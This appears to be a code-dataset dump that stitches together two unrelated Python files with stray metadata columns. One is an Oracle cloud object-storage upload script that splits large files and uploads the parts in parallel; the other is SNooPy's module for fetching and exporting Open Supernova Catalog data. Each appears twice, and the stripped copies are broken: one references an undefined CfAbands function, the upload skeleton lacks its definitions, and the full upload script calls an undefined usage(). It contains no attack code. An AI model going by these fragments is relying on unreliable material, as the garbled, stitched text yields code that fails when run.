__author__ = "Andrew Hopkinson (Oracle Cloud Solutions A-Team)"
__copyright__ = "Copyright (c) 2013, 2014-2017 Oracle and/or its affiliates. All rights reserved."
__ekitversion__ = "@VERSION@"
__ekitrelease__ = "@RELEASE@"
__version__ = "1.0.0.0"
__date__ = "@BUILDDATE@"
__status__ = "Development"
__module__ = "upload_storage_object"
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
import sys
# Import utility methods
# Define methods
# Read Module Arguments
# Main processing function
# Main function to kick off processing
if __name__ == "__main__":
main(sys.argv[1:])
| 35.919431
| 197
| 0.613933
|
#!/usr/bin/python
# Copyright (c) 2013, 2014-2017 Oracle and/or its affiliates. All rights reserved.
"""Provide Module Description
"""
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
__author__ = "Andrew Hopkinson (Oracle Cloud Solutions A-Team)"
__copyright__ = "Copyright (c) 2013, 2014-2017 Oracle and/or its affiliates. All rights reserved."
__ekitversion__ = "@VERSION@"
__ekitrelease__ = "@RELEASE@"
__version__ = "1.0.0.0"
__date__ = "@BUILDDATE@"
__status__ = "Development"
__module__ = "upload_storage_object"
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
import datetime
import getopt
import hashlib
import json
import locale
import logging
import multiprocessing
import operator
import os
import requests
import shutil
import subprocess
import sys
import tempfile
from contextlib import closing
# Import utility methods
from oscsutils import callRESTApi
from oscsutils import getPassword
from oscsutils import printJSON
from authenticate_oscs import authenticate
from oc_exceptions import REST401Exception
# Define methods
def md5(fname, readbuf=104857600, **kwargs):
hash_md5 = hashlib.md5()
cnt = 1
with open(fname, "rb") as f:
for chunk in iter(lambda: f.read(readbuf), b""):
hash_md5.update(chunk)
#print('Chunk: '+str(cnt))
cnt +=1
return hash_md5.hexdigest()
def getsplitprefix(filename):
return os.path.split(filename)[-1] + '-'
def getsplitdir(filename):
return filename + '.split'
def splitfile(filename, size='5GB', **kwargs):
files = []
if filename is not None:
splitdir = getsplitdir(filename)
os.makedirs(splitdir)
prefix = os.path.join(splitdir, getsplitprefix(filename))
cmd = ['split', '-b', size, filename, prefix]
cmdEnv = dict(os.environ)
outputLines = []
with closing(tempfile.TemporaryFile()) as fout:
try:
outputLines = subprocess.check_output(cmd, env=cmdEnv, stderr=fout).splitlines()
except subprocess.CalledProcessError as e:
fout.flush()
fout.seek(0)
print(fout.read())
print('\n'.join(outputLines))
raise e
return [os.path.join(splitdir, fn) for fn in os.listdir(splitdir)]
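# Usage sketch only; the path below is illustrative and must point at an existing file.
# splitfile() shells out to GNU split, so the pieces land in "<file>.split/" and are named
# "<file>-aa", "<file>-ab", ... each at most the requested size (the same "<n>MB" size
# strings used by uploadStorageObject below are accepted).
def example_split_usage(path='/tmp/example.img'):
    return splitfile(path, size='500MB')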
def uploadfile((endpoint, basepath, authtoken, filename, authendpoint, user, password, headers, params)):
print('Uploading : ' + filename)
files = None
resourcename = os.path.split(filename)[-1]
try:
with closing(open(filename, 'rb')) as f:
response = callRESTApi(endpoint, basepath, resourcename, method='PUT', authtoken=authtoken, headers=headers, params=params, data=f, files=files)
except REST401Exception as e:
# Reauthenticate and retry
if authendpoint is not None and user is not None and password is not None:
authtoken, endpoint = authenticate(authendpoint, user, password)
with closing(open(filename, 'rb')) as f:
response = callRESTApi(endpoint, basepath, resourcename, method='PUT', authtoken=authtoken, headers=headers, params=params, data=f, files=files)
else:
raise
print('Uploaded : ' + filename)
return
def uploadStorageObject(endpoint, container='compute_images', authtoken=None, filename=None, splitsize=4000, poolsize=4, authendpoint=None, user=None, password=None, extractarchive=None, **kwargs):
basepath = container
imgbasepath = basepath
splitbasepath = basepath + '_segments'
headers = None
params = None
if extractarchive is not None:
if params is None:
params = {}
params['extract-archive'] = extractarchive
data = None
files = None
jsonResponse = ''
if filename is not None and os.path.exists(filename):
#md5hash = md5(filename)
filesize = os.path.getsize(filename)
filesize /= (1024 * 1024)
if filesize > splitsize:
print('Splitting : ' + filename)
filelist = splitfile(filename, str(splitsize) + 'MB')
print('Into ' + str(len(filelist)) + ' segments')
basepath = splitbasepath + '/' + os.path.split(filename)[-1] + '/_segment_'
pool = multiprocessing.Pool(poolsize)
            # Build tuple list
workerdata = []
for fn in filelist:
workerdata.append([endpoint, basepath, authtoken, fn, authendpoint, user, password, headers, params])
#print(workerdata)
# Start processes
pool.map(uploadfile, workerdata)
# Upload manifest file to point to parts
manifest = basepath + '/' + getsplitprefix(filename)
resourcename = os.path.split(filename)[-1]
headers = {'Content-Length': "0", 'X-Object-Manifest': manifest}
printJSON(headers)
data = None
basepath = imgbasepath
try:
response = callRESTApi(endpoint, basepath, resourcename, method='PUT', authtoken=authtoken, headers=headers, params=params, data=data, files=files)
except REST401Exception as e:
# Reauthenticate and retry
if authendpoint is not None and user is not None and password is not None:
authtoken, endpoint = authenticate(authendpoint, user, password)
response = callRESTApi(endpoint, basepath, resourcename, method='PUT', authtoken=authtoken, headers=headers, params=params, data=data, files=files)
else:
raise
# Remove splitfiles
splitdir = getsplitdir(filename)
shutil.rmtree(splitdir)
else:
# Simple single file upload
basepath = imgbasepath
# Upload file
print('Uploading : ' + filename)
resourcename = os.path.split(filename)[-1]
with closing(open(filename, 'rb')) as f:
response = callRESTApi(endpoint, basepath, resourcename, method='PUT', authtoken=authtoken, headers=headers, params=params, data=f, files=files)
print('Uploaded : ' + filename)
jsonResponse = response.text
return jsonResponse
# Read Module Arguments
def readModuleArgs(opts, args):
moduleArgs = {}
moduleArgs['endpoint'] = None
moduleArgs['user'] = None
moduleArgs['password'] = None
moduleArgs['pwdfile'] = None
# Read Module Command Line Arguments.
for opt, arg in opts:
if opt in ("-e", "--endpoint"):
moduleArgs['endpoint'] = arg
elif opt in ("-u", "--user"):
moduleArgs['user'] = arg
elif opt in ("-p", "--password"):
moduleArgs['password'] = arg
elif opt in ("-P", "--pwdfile"):
moduleArgs['pwdfile'] = arg
return moduleArgs
# Main processing function
def main(argv):
# Configure Parameters and Options
options = 'e:u:p:P:'
longOptions = ['endpoint=', 'user=', 'password=', 'pwdfile=']
# Get Options & Arguments
try:
opts, args = getopt.getopt(argv, options, longOptions)
# Read Module Arguments
moduleArgs = readModuleArgs(opts, args)
except getopt.GetoptError:
usage()
except Exception as e:
print('Unknown Exception please check log file')
logging.exception(e)
sys.exit(1)
return
# Main function to kick off processing
if __name__ == "__main__":
main(sys.argv[1:])
| 0
| 0
| 0
| 0
| 0
| 6,118
| 0
| -2
| 601
|
70aa394b1e7534f0761f177159418f6363ceeb78
| 14,891
|
py
|
Python
|
snpy/get_osc.py
|
emirkmo/snpy
|
2a0153c84477ba8a30310d7dbca3d5a8f24de3c6
|
[
"MIT"
] | 6
|
2019-01-14T19:40:45.000Z
|
2021-06-05T12:19:39.000Z
|
snpy/get_osc.py
|
emirkmo/snpy
|
2a0153c84477ba8a30310d7dbca3d5a8f24de3c6
|
[
"MIT"
] | 3
|
2017-04-25T20:06:22.000Z
|
2021-06-09T20:46:41.000Z
|
snpy/get_osc.py
|
emirkmo/snpy
|
2a0153c84477ba8a30310d7dbca3d5a8f24de3c6
|
[
"MIT"
] | 8
|
2017-04-25T19:57:57.000Z
|
2021-11-12T11:54:19.000Z
|
'''
Module for SNooPy to download/parse data from the Open Supernova Catalog.
'''
from __future__ import print_function
import six
import json
if six.PY3:
import urllib.request as urllib
else:
import urllib
from astropy.coordinates import Angle
from snpy import sn, lc, fset
from numpy import array, log10
import astropy.units as u
from snpy.filters import spectrum
from snpy.specobj import timespec
# Some well-known publications and their mappings:
pubs = {
'1999AJ....117..707R': # Riess et al. (1999) Standard Photometry
CfAbands,
'2006AJ....131..527J': # Jha et al. (2006) Standard Photometry
CfAbands,
'2009ApJ...700..331H': # Hicken et al. (2009) CfA3 Natural Photometry
CfAbands,
'2012ApJS..200...12H': # Hicken et al. (2012) CfA4 Natural Photometry
CfAbands
}
# telescope,band --> SNooPy filter database
# We do this by matching (band,system,telescope,observatory) info from the
# database to SNooPy filters.
ftrans = {}
ftrans_standard = {}
standard_warnings = {}
for band in ['u','g','r','i','B','V','Y','J','H','K']:
ftrans[(band,"CSP",'',"LCO")] = band
for band in ['U','B','V','R','I']:
ftrans[(band,'','kait2','')] = band+'kait'
for band in ['U','B','V','R','I']:
ftrans[(band,'','kait3','')] = band+'kait'
for band in ['J','H','Ks']:
ftrans[(band,'','PAIRITEL','')] = band+'2m'
for band in ['B','V','R','I']:
ftrans[(band,'','kait4', '')] = band+'kait'
for band in ['U','V','B']:
ftrans[(band, 'Vega','Swift','')] = band+"_UVOT"
for band in ['UVW1','UVW2','UVM2']:
ftrans[(band, 'Vega','Swift','')] = band
for band in ['g','r','i','z']:
ftrans[(band, '', 'PS1','')] = "ps1_"+band
# These are for data in (what I'm assuming) would be standard filters.
# We will issue a warning, though.
for band in ['U','B','V','R','I']:
ftrans_standard[(band,'','','')] = band+"s"
standard_warnings[band] = "Johnson/Kron/Cousins "
for band in ['u','g','r','i','z']:
ftrans_standard[(band,'','','')] = band+"_40"
standard_warnings[band] = "Sloan (APO) "
for band in ["u'","g'","r'","i'","z'"]:
ftrans_standard[(band,'','','')] = band[0]+"_40"
standard_warnings[band] = "Sloan (USNO-40) "
for band in ["J","H","Ks"]:
ftrans_standard[(band[0],'','','')] = band+"2m"
standard_warnings[band[0]] = "2MASS "
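# Illustrative lookup only (not part of the catalog parser): given the photometry metadata
# tuple used above, fall back from the instrument-specific table to the standard-filter
# table, roughly in the order get_obj() tries them below.
def _example_filter_lookup(band, system='', telescope='', observatory=''):
    key = (band, system, telescope, observatory)
    if key in ftrans:
        return ftrans[key]                          # e.g. ('B', '', 'kait3', '') -> 'Bkait'
    return ftrans_standard.get((band, '', '', ''))  # e.g. plain 'V' -> 'Vs'; None if unknown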
# Our own photometric systems:
def CSP_systems(filt, MJD):
'''Given a filter name and MJD date, output the correct telescope and
system information.'''
if filt == "V":
if MJD < 53748.0:
return (dict(telescope='Swope',instrument='Site2',band='V-3014',
zeropoint="{:.4f}".format(fset['V0'].zp)))
elif MJD < 53759.0:
return (dict(telescope='Swope',instrument='Site2',band='V-3009',
zeropoint="{:.4f}".format(fset['V1'].zp)))
elif MJD < 56566.0:
return (dict(telescope='Swope',instrument='Site2',band='V-9844',
zeropoint="{:.4f}".format(fset['V'].zp)))
else:
return (dict(telescope='Swope',instrument='e2v',band='V-9844',
zeropoint="{:.4f}".format(fset['V2'].zp)))
if filt == "Jrc2":
return (dict(telescope='Swope',instrument='RetroCam',band='J',
zeropoint="{:.4f}".format(fset[filt].zp)))
if filt in ['u','g','r','i','B']:
if MJD < 56566.0:
return (dict(telescope='Swope',instrument='Site2',band=filt,
zeropoint="{:.4f}".format(fset[filt].zp)))
else:
return (dict(telescope='Swope',instrument='e2v',band=filt,
zeropoint="{:.4f}".format(fset[filt+'2'].zp)))
if filt in ['Y','J','H']:
if MJD < 55743.0:
return (dict(telescope='Swope',instrument='RetroCam',band=filt,
zeropoint="{:.4f}".format(fset[filt].zp)))
else:
return (dict(telescope='DuPont',instrument='RetroCam',band=filt,
zeropoint="{:.4f}".format(fset[filt+'d'].zp)))
return({})
MJD_offsets = {
'MJD':0,
'JD':-2400000.5
}
warning_message = {
'upperlims_noerr':'Warning: Data lacking errorbars or with upper-limits not imported',
'upperlims':'Warning: Data with upper-limits not imported',
}
OSC_template = '''https://sne.space/astrocats/astrocats/supernovae/output/json/{}.json'''
def get_obj(url, full_data=True, allow_no_errors=False, missing_error=0.01):
   '''Attempt to build a SNooPy object from an Open Supernova Catalog server
URL.'''
if url.find('osc:') == 0:
# Try to construct a url based only on a name.
url = OSC_template.format(url.split(':')[1])
try:
uf = urllib.urlopen(url)
except:
return None,"Invalid URL"
try:
d = json.load(uf)
except:
uf.close()
if full_data:
return None,"Failed to decode JSON",None
return None,"Failed to decode JSON"
else:
uf.close()
# We now have the JSON data. Get the info we need
d = list(d.values())[0]
name = d['name']
if 'redshift' not in d or 'ra' not in d or 'dec' not in d:
return None,"No redshift, RA, or DEC found"
zhel = float(d['redshift'][0]['value'])
ra = Angle(" ".join([d['ra'][0]['value'],d['ra'][0]['u_value']])).degree
decl = Angle(" ".join([d['dec'][0]['value'],d['dec'][0]['u_value']])).degree
snobj = sn(name, ra=ra, dec=decl, z=zhel)
# All primary sources
all_sources_dict = [item for item in d['sources'] \
if not item.get('secondary',False)]
all_sources_dict2 = [item for item in d['sources'] \
if item.get('secondary',False)]
all_sources = {}
for source in all_sources_dict:
all_sources[source['alias']] = (source.get('bibcode',''),
source.get('reference',''))
all_sources2 = {}
for source in all_sources_dict2:
all_sources2[source['alias']] = (source.get('bibcode',''),
source.get('reference',''))
# Next, the photometry.
used_sources = []
MJD = {}
mags = {}
emags = {}
sids = {}
known_unknowns = []
unknown_unknowns = []
warnings = []
photometry = d.get('photometry', [])
for p in photometry:
if p.get('upperlimit',False):
continue
t = (p.get('band',''),p.get('system',''),p.get('telescope',''),
p.get('observatory',''))
# Deal with source of photometry
ss = p.get('source').split(',')
this_source = None
for s in ss:
if s in all_sources:
this_source = all_sources[s]
break
if this_source is None:
for s in ss:
if s in all_sources2:
this_source = all_sources2[s]
if this_source is None:
print("Warning: no primary source, skipping")
continue
bibcode = this_source[0]
if bibcode in pubs:
b = pubs[bibcode](t[0],float(p['time']))
elif t in ftrans:
b = ftrans[t]
elif t in ftrans_standard:
b = ftrans_standard[t]
if t not in known_unknowns:
known_unknowns.append(t)
print("Warning: no telescope/system info, assuming ", \
standard_warnings[b[0]], b[0])
elif (t[0],"","","") in ftrans_standard:
b = ftrans_standard[(t[0],"","","")]
if t not in known_unknowns:
known_unknowns.append(t)
print("Warning: telescope/system defined by %s/%s/%s not "\
"recognized, assuming %s %s" %\
(t[1],t[2],t[3],standard_warnings[t[0]],t[0]))
else:
# No idea
if t not in unknown_unknowns:
unknown_unknowns.append(t)
print("Warning: telescope/system defined by %s/%s/%s not "\
"recognized and can't figure out the filter %s" % \
(t[1],t[2],t[3],t[0]))
unknown_unknowns.append(t)
continue
if b not in MJD:
MJD[b] = []
mags[b] = []
emags[b] = []
sids[b] = []
if 'time' in p and 'magnitude' in p:
if not allow_no_errors and 'e_magnitude' not in p and\
'e_lower_magnitude' not in p and 'e_upper_magnitude' not in p:
if 'upperlims' not in warnings: warnings.append('upperlims')
continue
MJD[b].append(float(p['time']))
mags[b].append(float(p['magnitude']))
if 'e_magnitude' in p:
emags[b].append(float(p['e_magnitude']))
elif 'e_lower_magnitude' in p and 'e_upper_magnitude' in p:
emags[b].append((float(p['e_lower_magnitude']) +\
float(p['e_upper_magnitude']))/2)
else:
emags[b].append(missing_error)
elif 'time' in p and 'countrate' in p and 'zeropoint' in p:
if not allow_no_errors and 'e_countrate' not in p:
if 'upperlims' not in warnings: warnings.append('upperlims')
continue
if float(p['countrate']) < 0: continue
MJD[b].append(float(p['time']))
mags[b].append(-2.5*log10(float(p['countrate'])) + \
float(p['zeropoint']))
ec = p.get('e_countrate',None)
if ec is not None:
emags[b].append(1.087*float(p['e_countrate'])/float(p['countrate']))
else:
emags[b].append(missing_error)
else:
if 'upperlims_noerr' not in warnings:
warnings.append('upperlims_noerr')
continue
if this_source not in used_sources:
used_sources.append(this_source)
# At this point we're actually using the photometry, so find source
sid = used_sources.index(this_source)
sids[b].append(sid)
for b in MJD:
if len(MJD[b]) > 0:
snobj.data[b] = lc(snobj, b, array(MJD[b]), array(mags[b]),
array(emags[b]), sids=array(sids[b], dtype=int))
snobj.data[b].time_sort()
snobj.sources = used_sources
snobj.get_restbands()
if len(unknown_unknowns) > 0:
unknown_unknowns = list(set(unknown_unknowns))
print("Warning: the following photometry was not recognized by SNooPy")
print("and was not imported:")
for item in unknown_unknowns:
print(item)
if warnings:
for warning in warnings:
print(warning_message[warning])
# lastly, the spectroscopy
if d.get('spectra',None) is not None:
spectra = []
dates = []
sids = []
for s in d['spectra']:
wu = s.get('u_wavelengths', 'Agnstrom')
fu = s.get('u_fluxes', 'Uncalibrated')
try:
wu = u.Unit(wu)
except ValueError:
print("Warning: unrecognized unit for wavelength: {}".format(wu))
print(" assuming Angstroms")
wu = u.Angstrom
if fu == 'Uncalibrated':
fluxed = False
fu = u.dimensionless_unscaled
else:
try:
fu = u.Unit(fu)
fluxed = True
except ValueError:
print("Warning: unrecognized unit for flux: {}".format(fu))
fluxed = False
fu = u.dimensionless_unscaled
tu = s.get('u_time', 'MJD')
t = float(s['time'])
if tu not in MJD_offsets:
print("Warning: unrecognized time unit: {}".format(tu))
if len(s['time'].split('.')[0]) == 7 and s['time'][0] == '2':
print(" assuming JD")
t = t - 2400000.5
elif len(s['time'].split('.')[0]) == 5 and s['time'][0] == '5':
print(" assuming MJD")
else:
print(" skipping this spectrum.")
continue
w = array([float(item[0]) for item in s['data']])*wu
f = array([float(item[1]) for item in s['data']])*fu
dr = s.get('deredshifted', False)
if dr:
w = w*(1+zhel)
# At this point, we should be able to convert to the units we want
w = w.to('Angstrom').value
if fluxed: f = f.to('erg / (s cm2 Angstrom)')
f = f.value
# source reference
srcs = s.get('source','').split(',')
this_source = None
for src in srcs:
if src in all_sources:
this_source = all_sources[src]
break
if this_source is None:
print("Warning: spectrum has no source")
if this_source not in used_sources:
used_sources.append(this_source)
# At this point we're actually using the spectroscopy, so find source
sid = used_sources.index(this_source)
sids.append(sid)
spectra.append(spectrum(wave=w, flux=f, fluxed=fluxed,
name="Spectrum MJD={:.1f}".format(t)))
dates.append(t)
snobj.sdata = timespec(snobj, dates, spectra)
snobj.sdata.sids = sids
if full_data:
# make a dictionary of the remaining OSC meta data and make it a member
# variable
snobj.osc_meta = {}
for key in d.keys():
if key not in ['name','redshift','ra','dec','sources','photometry',
'spectra']:
snobj.osc_meta[key] = d[key]
return(snobj,'Success')
def to_osc(s, ref=None, bibcode=None, source=1):
'''Given a supernova object, s, output to JSON format suitable for upload to
the OSC.'''
data = {s.name:{"name":s.name}}
if ref or bibcode:
sources = [dict(bibcode=bibcode, name=ref, alias=str(source))]
data['sources'] = sources
phot = []
for filt in s.data:
for i in range(len(s.data[filt].MJD)):
datum = dict(survey='CSP', observatory='LCO')
datum.update(CSP_systems(filt, s.data[filt].MJD[i]))
datum['time'] = "{:.3f}".format(s.data[filt].MJD[i])
datum['u_time'] = "MJD"
datum['magnitude'] = "{:.3f}".format(s.data[filt].mag[i])
flux,eflux = s.data[filt].flux[i],s.data[filt].e_flux[i]
datum['flux'] = "{:.5f}".format(flux)
datum['u_flux'] = "s^-1 cm^-2"
datum['e_flux'] = "{:.5f}".format(eflux)
datum['e_upper_magnitude'] = "{:.3f}".format(
-2.5*log10((flux-eflux)/flux))
datum['e_lower_magnitude'] = "{:.3f}".format(
-2.5*log10(flux/(flux+eflux)))
datum['source'] = "{}".format(source)
phot.append(datum)
data['photometry'] = phot
return json.dumps(data, indent=4)
| 36.05569
| 92
| 0.555906
|
'''
Module for SNooPy to download/parse data from the Open Supernova Catalog.
'''
from __future__ import print_function
import six
import json
if six.PY3:
import urllib.request as urllib
else:
import urllib
from astropy.coordinates import Angle
from snpy import sn,lc,fset
from numpy import array,log10
import astropy.units as u
from snpy.filters import spectrum
from snpy.specobj import timespec
def CfAbands(filt, MJD):
if MJD < 51913.0:
return filt[0]+'s' # standard photometry
elif 51913.0 < MJD < 55058:
if filt[0] == 'U': return 'U4sh'
if filt[0] == 'I': return 'I4sh'
if filt[0] == 'R': return 'R4sh'
return filt[0]+'k1' # natural photometry CfA3 + CfA4 period 1
else:
if filt[0] == 'U': return 'U4sh'
if filt[0] == 'I': return 'I4sh'
if filt[0] == 'R': return 'R4sh'
return filt[0]+'k2' # natural photometry CfA4 period 2
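# Illustrative only: the CfA filter name returned above depends on the observation epoch.
def _example_cfa_band_epochs():
    assert CfAbands('V', 51000.0) == 'Vs'    # standard photometry before MJD 51913
    assert CfAbands('B', 53000.0) == 'Bk1'   # CfA3 / CfA4 period-1 natural system
    assert CfAbands('B', 56000.0) == 'Bk2'   # CfA4 period-2 natural system
    assert CfAbands('U', 53000.0) == 'U4sh'  # U, R and I keep their shifted natural bands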
# Some well-known publications and their mappings:
pubs = {
'1999AJ....117..707R': # Riess et al. (1999) Standard Photometry
CfAbands,
'2006AJ....131..527J': # Jha et al. (2006) Standard Photometry
CfAbands,
'2009ApJ...700..331H': # Hicken et al. (2009) CfA3 Natural Photometry
CfAbands,
'2012ApJS..200...12H': # Hicken et al. (2012) CfA4 Natural Photometry
CfAbands
}
# telescope,band --> SNooPy filter database
# We do this by matching (band,system,telescope,observatory) info from the
# database to SNooPy filters.
ftrans = {}
ftrans_standard = {}
standard_warnings = {}
for band in ['u','g','r','i','B','V','Y','J','H','K']:
ftrans[(band,"CSP",'',"LCO")] = band
for band in ['U','B','V','R','I']:
ftrans[(band,'','kait2','')] = band+'kait'
for band in ['U','B','V','R','I']:
ftrans[(band,'','kait3','')] = band+'kait'
for band in ['J','H','Ks']:
ftrans[(band,'','PAIRITEL','')] = band+'2m'
for band in ['B','V','R','I']:
ftrans[(band,'','kait4', '')] = band+'kait'
for band in ['U','V','B']:
ftrans[(band, 'Vega','Swift','')] = band+"_UVOT"
for band in ['UVW1','UVW2','UVM2']:
ftrans[(band, 'Vega','Swift','')] = band
for band in ['g','r','i','z']:
ftrans[(band, '', 'PS1','')] = "ps1_"+band
# These are for data in (what I'm assuming) would be standard filters.
# We will issue a warning, though.
for band in ['U','B','V','R','I']:
ftrans_standard[(band,'','','')] = band+"s"
standard_warnings[band] = "Johnson/Kron/Cousins "
for band in ['u','g','r','i','z']:
ftrans_standard[(band,'','','')] = band+"_40"
standard_warnings[band] = "Sloan (APO) "
for band in ["u'","g'","r'","i'","z'"]:
ftrans_standard[(band,'','','')] = band[0]+"_40"
standard_warnings[band] = "Sloan (USNO-40) "
for band in ["J","H","Ks"]:
ftrans_standard[(band[0],'','','')] = band+"2m"
standard_warnings[band[0]] = "2MASS "
# Our own photometric systems:
def CSP_systems(filt, MJD):
'''Given a filter name and MJD date, output the correct telescope and
system information.'''
if filt == "V":
if MJD < 53748.0:
return (dict(telescope='Swope',instrument='Site2',band='V-3014',
zeropoint="{:.4f}".format(fset['V0'].zp)))
elif MJD < 53759.0:
return (dict(telescope='Swope',instrument='Site2',band='V-3009',
zeropoint="{:.4f}".format(fset['V1'].zp)))
elif MJD < 56566.0:
return (dict(telescope='Swope',instrument='Site2',band='V-9844',
zeropoint="{:.4f}".format(fset['V'].zp)))
else:
return (dict(telescope='Swope',instrument='e2v',band='V-9844',
zeropoint="{:.4f}".format(fset['V2'].zp)))
if filt == "Jrc2":
return (dict(telescope='Swope',instrument='RetroCam',band='J',
zeropoint="{:.4f}".format(fset[filt].zp)))
if filt in ['u','g','r','i','B']:
if MJD < 56566.0:
return (dict(telescope='Swope',instrument='Site2',band=filt,
zeropoint="{:.4f}".format(fset[filt].zp)))
else:
return (dict(telescope='Swope',instrument='e2v',band=filt,
zeropoint="{:.4f}".format(fset[filt+'2'].zp)))
if filt in ['Y','J','H']:
if MJD < 55743.0:
return (dict(telescope='Swope',instrument='RetroCam',band=filt,
zeropoint="{:.4f}".format(fset[filt].zp)))
else:
return (dict(telescope='DuPont',instrument='RetroCam',band=filt,
zeropoint="{:.4f}".format(fset[filt+'d'].zp)))
return({})
MJD_offsets = {
'MJD':0,
'JD':-2400000.5
}
warning_message = {
'upperlims_noerr':'Warning: Data lacking errorbars or with upper-limits not imported',
'upperlims':'Warning: Data with upper-limits not imported',
}
OSC_template = '''https://sne.space/astrocats/astrocats/supernovae/output/json/{}.json'''
def get_obj(url, full_data=True, allow_no_errors=False, missing_error=0.01):
   '''Attempt to build a SNooPy object from an Open Supernova Catalog server
URL.'''
if url.find('osc:') == 0:
# Try to construct a url based only on a name.
url = OSC_template.format(url.split(':')[1])
try:
uf = urllib.urlopen(url)
except:
return None,"Invalid URL"
try:
d = json.load(uf)
except:
uf.close()
if full_data:
return None,"Failed to decode JSON",None
return None,"Failed to decode JSON"
else:
uf.close()
# We now have the JSON data. Get the info we need
d = list(d.values())[0]
name = d['name']
if 'redshift' not in d or 'ra' not in d or 'dec' not in d:
return None,"No redshift, RA, or DEC found"
zhel = float(d['redshift'][0]['value'])
ra = Angle(" ".join([d['ra'][0]['value'],d['ra'][0]['u_value']])).degree
decl = Angle(" ".join([d['dec'][0]['value'],d['dec'][0]['u_value']])).degree
snobj = sn(name, ra=ra, dec=decl, z=zhel)
# All primary sources
all_sources_dict = [item for item in d['sources'] \
if not item.get('secondary',False)]
all_sources_dict2 = [item for item in d['sources'] \
if item.get('secondary',False)]
all_sources = {}
for source in all_sources_dict:
all_sources[source['alias']] = (source.get('bibcode',''),
source.get('reference',''))
all_sources2 = {}
for source in all_sources_dict2:
all_sources2[source['alias']] = (source.get('bibcode',''),
source.get('reference',''))
# Next, the photometry.
used_sources = []
MJD = {}
mags = {}
emags = {}
sids = {}
known_unknowns = []
unknown_unknowns = []
warnings = []
photometry = d.get('photometry', [])
for p in photometry:
if p.get('upperlimit',False):
continue
t = (p.get('band',''),p.get('system',''),p.get('telescope',''),
p.get('observatory',''))
# Deal with source of photometry
ss = p.get('source').split(',')
this_source = None
for s in ss:
if s in all_sources:
this_source = all_sources[s]
break
if this_source is None:
for s in ss:
if s in all_sources2:
this_source = all_sources2[s]
if this_source is None:
print("Warning: no primary source, skipping")
continue
bibcode = this_source[0]
if bibcode in pubs:
b = pubs[bibcode](t[0],float(p['time']))
elif t in ftrans:
b = ftrans[t]
elif t in ftrans_standard:
b = ftrans_standard[t]
if t not in known_unknowns:
known_unknowns.append(t)
print("Warning: no telescope/system info, assuming ", \
standard_warnings[b[0]], b[0])
elif (t[0],"","","") in ftrans_standard:
b = ftrans_standard[(t[0],"","","")]
if t not in known_unknowns:
known_unknowns.append(t)
print("Warning: telescope/system defined by %s/%s/%s not "\
"recognized, assuming %s %s" %\
(t[1],t[2],t[3],standard_warnings[t[0]],t[0]))
else:
# No idea
if t not in unknown_unknowns:
unknown_unknowns.append(t)
print("Warning: telescope/system defined by %s/%s/%s not "\
"recognized and can't figure out the filter %s" % \
(t[1],t[2],t[3],t[0]))
unknown_unknowns.append(t)
continue
if b not in MJD:
MJD[b] = []
mags[b] = []
emags[b] = []
sids[b] = []
if 'time' in p and 'magnitude' in p:
if not allow_no_errors and 'e_magnitude' not in p and\
'e_lower_magnitude' not in p and 'e_upper_magnitude' not in p:
if 'upperlims' not in warnings: warnings.append('upperlims')
continue
MJD[b].append(float(p['time']))
mags[b].append(float(p['magnitude']))
if 'e_magnitude' in p:
emags[b].append(float(p['e_magnitude']))
elif 'e_lower_magnitude' in p and 'e_upper_magnitude' in p:
emags[b].append((float(p['e_lower_magnitude']) +\
float(p['e_upper_magnitude']))/2)
else:
emags[b].append(missing_error)
elif 'time' in p and 'countrate' in p and 'zeropoint' in p:
if not allow_no_errors and 'e_countrate' not in p:
if 'upperlims' not in warnings: warnings.append('upperlims')
continue
if float(p['countrate']) < 0: continue
MJD[b].append(float(p['time']))
mags[b].append(-2.5*log10(float(p['countrate'])) + \
float(p['zeropoint']))
ec = p.get('e_countrate',None)
if ec is not None:
emags[b].append(1.087*float(p['e_countrate'])/float(p['countrate']))
else:
emags[b].append(missing_error)
else:
if 'upperlims_noerr' not in warnings:
warnings.append('upperlims_noerr')
continue
if this_source not in used_sources:
used_sources.append(this_source)
# At this point we're actually using the photometry, so find source
sid = used_sources.index(this_source)
sids[b].append(sid)
for b in MJD:
if len(MJD[b]) > 0:
snobj.data[b] = lc(snobj, b, array(MJD[b]), array(mags[b]),
array(emags[b]), sids=array(sids[b], dtype=int))
snobj.data[b].time_sort()
snobj.sources = used_sources
snobj.get_restbands()
if len(unknown_unknowns) > 0:
unknown_unknowns = list(set(unknown_unknowns))
print("Warning: the following photometry was not recognized by SNooPy")
print("and was not imported:")
for item in unknown_unknowns:
print(item)
if warnings:
for warning in warnings:
print(warning_message[warning])
# lastly, the spectroscopy
if d.get('spectra',None) is not None:
spectra = []
dates = []
sids = []
for s in d['spectra']:
wu = s.get('u_wavelengths', 'Agnstrom')
fu = s.get('u_fluxes', 'Uncalibrated')
try:
wu = u.Unit(wu)
except ValueError:
print("Warning: unrecognized unit for wavelength: {}".format(wu))
print(" assuming Angstroms")
wu = u.Angstrom
if fu == 'Uncalibrated':
fluxed = False
fu = u.dimensionless_unscaled
else:
try:
fu = u.Unit(fu)
fluxed = True
except ValueError:
print("Warning: unrecognized unit for flux: {}".format(fu))
fluxed = False
fu = u.dimensionless_unscaled
tu = s.get('u_time', 'MJD')
t = float(s['time'])
if tu not in MJD_offsets:
print("Warning: unrecognized time unit: {}".format(tu))
if len(s['time'].split('.')[0]) == 7 and s['time'][0] == '2':
print(" assuming JD")
t = t - 2400000.5
elif len(s['time'].split('.')[0]) == 5 and s['time'][0] == '5':
print(" assuming MJD")
else:
print(" skipping this spectrum.")
continue
w = array([float(item[0]) for item in s['data']])*wu
f = array([float(item[1]) for item in s['data']])*fu
dr = s.get('deredshifted', False)
if dr:
w = w*(1+zhel)
# At this point, we should be able to convert to the units we want
w = w.to('Angstrom').value
if fluxed: f = f.to('erg / (s cm2 Angstrom)')
f = f.value
# source reference
srcs = s.get('source','').split(',')
this_source = None
for src in srcs:
if src in all_sources:
this_source = all_sources[src]
break
if this_source is None:
print("Warning: spectrum has no source")
if this_source not in used_sources:
used_sources.append(this_source)
# At this point we're actually using the spectroscopy, so find source
sid = used_sources.index(this_source)
